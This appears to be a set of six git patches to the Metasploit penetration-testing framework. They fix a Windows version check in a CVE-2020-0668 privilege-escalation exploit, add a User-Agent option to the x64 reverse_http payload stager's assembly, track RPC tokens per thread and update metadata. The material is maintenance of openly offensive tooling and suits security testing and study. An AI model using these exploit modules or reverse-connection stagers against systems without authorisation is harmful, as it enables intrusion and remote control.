From 686a463a87a1c7e5e3f6f833872dc6365bdac401 Mon Sep 17 00:00:00 2001
From: sjanusz-r7 <Simon_Janusz@rapid7.com>
Date: Thu, 12 Dec 2024 12:57:20 +0000
Subject: [PATCH 1/6] Keep track of RPC token per-thread

---
 lib/msf/core/rpc/v10/service.rb | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/rpc/v10/service.rb b/lib/msf/core/rpc/v10/service.rb
index 90f8c3b3e6d8..81dfbbb99064 100644
--- a/lib/msf/core/rpc/v10/service.rb
+++ b/lib/msf/core/rpc/v10/service.rb
@@ -140,11 +140,16 @@ def process(req)
         end
       end
 
-      ::Timeout.timeout(self.dispatcher_timeout) { self.handlers[group].send(mname, *msg) }
+      ::Timeout.timeout(self.dispatcher_timeout) do
+        Thread.current[:rpc_token] = token
+        self.handlers[group].send(mname, *msg)
+      end
 
     rescue ::Exception => e
       elog('RPC Exception', error: e)
       process_exception(e)
+    ensure
+      Thread.current[:rpc_token] = nil
     end
   end
 

From 48ed31f32349443a3a9538fa4f011b085e9d32fa Mon Sep 17 00:00:00 2001
From: bwatters-r7 <bwatters@rapid7.com>
Date: Thu, 12 Dec 2024 17:11:53 -0600
Subject: [PATCH 2/6] Fix version check

---
 .../exploits/windows/local/cve_2020_0668_service_tracing.rb   | 4 +---
 1 file changed, 1 insertion(+), 3 deletions(-)

diff --git a/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb b/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb
index 629d097e29fd..a2ab61079da6 100644
--- a/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb
+++ b/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb
@@ -261,7 +261,6 @@ def exploit
 
     # start file copy
     rastapi_privileged_filecopy(payload_dll, exploit_dir, upload_payload_pathname, target_payload_pathname)
-
     # launch trigger
     launch_dll_trigger
     print_warning("Manual cleanup after reboot required for #{target_payload_pathname} and #{exploit_dir}")
@@ -285,8 +284,7 @@ def validate_target
     end
 
     version_info = get_version_info
-    vprint_status("Version: #{version_info.number}")
-    unless version_info.build_version.between?(Msf::WindowsVersion::Win10_1803, Msf::WindowsVersion::Win10_1909)
+    unless version_info.build_number.between?(Msf::WindowsVersion::Win10_1803, Msf::WindowsVersion::Win10_1909)
       fail_with(Failure::NotVulnerable, 'The exploit only supports Windows 10 build versions 17134-18363')
     end
   end

From 50b12596a635e2dc0d12189baed6441d54db15f0 Mon Sep 17 00:00:00 2001
From: jenkins-metasploit <jenkins-metasploit@build-production.r7ops.com>
Date: Fri, 13 Dec 2024 19:54:06 +0000
Subject: [PATCH 3/6] automatic module_metadata_base.json update

---
 db/modules_metadata_base.json | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json
index 8b95aae87260..19d621d22692 100644
--- a/db/modules_metadata_base.json
+++ b/db/modules_metadata_base.json
@@ -177848,7 +177848,7 @@
     "targets": [
       "Windows x64"
     ],
-    "mod_time": "2023-05-25 12:45:30 +0000",
+    "mod_time": "2024-12-12 17:11:53 +0000",
     "path": "/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb",
     "is_install_path": true,
     "ref_name": "windows/local/cve_2020_0668_service_tracing",

From 8af31e6b01704cd5c687ed6ad7fd27bb5a483815 Mon Sep 17 00:00:00 2001
From: pczinser <pczinser@pm.me>
Date: Sat, 14 Dec 2024 15:39:16 -0500
Subject: [PATCH 4/6] updated the inline asm to use User Agent

---
 .../payload/windows/x64/reverse_http_x64.rb     | 17 +++++++++++++++--
 1 file changed, 15 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/payload/windows/x64/reverse_http_x64.rb b/lib/msf/core/payload/windows/x64/reverse_http_x64.rb
index 21e87d26efef..d6ddf74b7cb6 100644
--- a/lib/msf/core/payload/windows/x64/reverse_http_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_http_x64.rb
@@ -62,7 +62,7 @@ def generate(opts={})
       # Otherwise default to small URIs
       conf[:url]        = luri + generate_small_uri
     end
-
+  
     generate_reverse_http(conf)
   end
 
@@ -168,6 +168,7 @@ def asm_generate_ascii_array(str)
   # @option opts [String] :url The URI to request during staging
   # @option opts [String] :host The host to connect to
   # @option opts [Integer] :port The port to connect to
+  # @option opts [String] :ua The User Agent the payload will use
   # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh
   # @option opts [String] :proxy_host The optional proxy server host to use
   # @option opts [Integer] :proxy_port The optional proxy server port to use
@@ -245,9 +246,21 @@ def asm_reverse_http(opts={})
       internetopen:
         push rbx                      ; stack alignment
         push rbx                      ; NULL pointer
-        mov rcx, rsp                  ; lpszAgent ("")
     ^
 
+    if opts[:ua]
+      asm << %Q^
+        call load_useragent
+        db"#{opts[:ua]}", 0x00
+      load_useragent:
+        pop rcx                         ; lpszAgent (stack pointer)
+      ^
+    else
+      asm << %Q^
+        mov rcx, rsp                    ; lpszAgent("")
+      ^
+    end
+
     if proxy_enabled
       asm << %Q^
         push 3

From b33b01e0d840b17e7347084651a7a2055c2c1f2e Mon Sep 17 00:00:00 2001
From: Christophe De La Fuente <christophe_delafuente@rapid7.com>
Date: Mon, 16 Dec 2024 12:48:57 +0100
Subject: [PATCH 5/6] Update the CachedSize for `reverse_http` and
 `reverse_http` payloads

---
 modules/payloads/stagers/windows/x64/reverse_http.rb  | 2 +-
 modules/payloads/stagers/windows/x64/reverse_https.rb | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/payloads/stagers/windows/x64/reverse_http.rb b/modules/payloads/stagers/windows/x64/reverse_http.rb
index 9bf4d4e30c75..36713ffeb8c4 100644
--- a/modules/payloads/stagers/windows/x64/reverse_http.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_http.rb
@@ -5,7 +5,7 @@
 
 module MetasploitModule
 
-  CachedSize = 528
+  CachedSize = 610
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows
diff --git a/modules/payloads/stagers/windows/x64/reverse_https.rb b/modules/payloads/stagers/windows/x64/reverse_https.rb
index bfbce09497aa..f83bfc7e39d2 100644
--- a/modules/payloads/stagers/windows/x64/reverse_https.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_https.rb
@@ -5,7 +5,7 @@
 
 module MetasploitModule
 
-  CachedSize = 562
+  CachedSize = 644
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows

From 88347ad2d47c17a9d6173518b4d7c66461c3c257 Mon Sep 17 00:00:00 2001
From: jenkins-metasploit <jenkins-metasploit@build-production.r7ops.com>
Date: Mon, 16 Dec 2024 12:13:37 +0000
Subject: [PATCH 6/6] automatic module_metadata_base.json update

---
 db/modules_metadata_base.json | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json
index 19d621d22692..5526ce4c4fdd 100644
--- a/db/modules_metadata_base.json
+++ b/db/modules_metadata_base.json
@@ -253471,7 +253471,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2024-12-16 12:48:57 +0000",
     "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb",
     "is_install_path": true,
     "ref_name": "windows/x64/custom/reverse_http",
@@ -253512,7 +253512,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2024-12-16 12:48:57 +0000",
     "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb",
     "is_install_path": true,
     "ref_name": "windows/x64/custom/reverse_https",
@@ -254229,7 +254229,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2024-12-16 12:48:57 +0000",
     "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb",
     "is_install_path": true,
     "ref_name": "windows/x64/meterpreter/reverse_http",
@@ -254273,7 +254273,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2024-12-16 12:48:57 +0000",
     "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb",
     "is_install_path": true,
     "ref_name": "windows/x64/meterpreter/reverse_https",
@@ -256015,7 +256015,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2024-12-16 12:48:57 +0000",
     "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb",
     "is_install_path": true,
     "ref_name": "windows/x64/vncinject/reverse_http",
@@ -256057,7 +256057,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2024-12-16 12:48:57 +0000",
     "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb",
     "is_install_path": true,
     "ref_name": "windows/x64/vncinject/reverse_https",